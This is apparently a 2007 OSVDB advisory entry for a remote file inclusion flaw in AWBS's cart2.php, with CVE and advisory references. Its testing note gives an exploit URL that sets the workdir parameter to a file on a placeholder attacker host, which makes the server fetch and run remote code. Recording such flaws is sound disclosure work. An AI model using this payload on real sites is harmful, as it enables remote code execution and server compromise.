AWBS docs/front-end-demo/cart2.php workdir Variable Remote File Inclusion

2007-04-24T10:48:52
ID OSVDB:35440
Type osvdb
Reporter OSVDB
Modified 2007-04-24T10:48:52

Description

Manual Testing Notes

http://[target]/[gpb_path]/docs/front-end-demo/cart2.php?workdir=http://[attacker]/for.txt?

References:

Vendor URL: http://www.awbs.com/ Secunia Advisory ID:25046 Other Advisory URL: http://milw0rm.com/exploits/3795 ISS X-Force ID: 33860 CVE-2007-2272 Bugtraq ID: 23633